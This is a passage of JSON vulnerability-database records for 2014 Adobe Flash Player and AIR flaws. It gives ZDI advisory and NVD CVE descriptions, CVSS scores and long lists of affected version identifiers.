An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "zdi", "title": "Adobe Flash Player Regular Expression Stack Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-08T00:00:00", "id": "ZDI-14-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-070/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T13:21:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of ExternalInterface. By manipulating a SWF's objects an attacker can force a dangling pointer to be reused after it has been freed. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "zdi", "title": "(Pwn2Own) Adobe Flash ExternalInterface Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506"], "modified": "2014-04-11T00:00:00", "id": "ZDI-14-092", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-092/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-09-20T13:52:26", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0515", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2014-0515"], "modified": "2018-12-13T16:02:00", "cpe": [], "id": "CVE-2014-0515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-20T13:50:06", "description": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0509", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", "cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", "cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:flash_player:11.0.1.152", 
"cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", "cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", "cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", 
"cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", "cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", 
"cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", "cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.297", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", "cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0509", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T13:53:18", "description": "Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0508", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", 
"cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", "cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:flash_player:11.0.1.152", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", 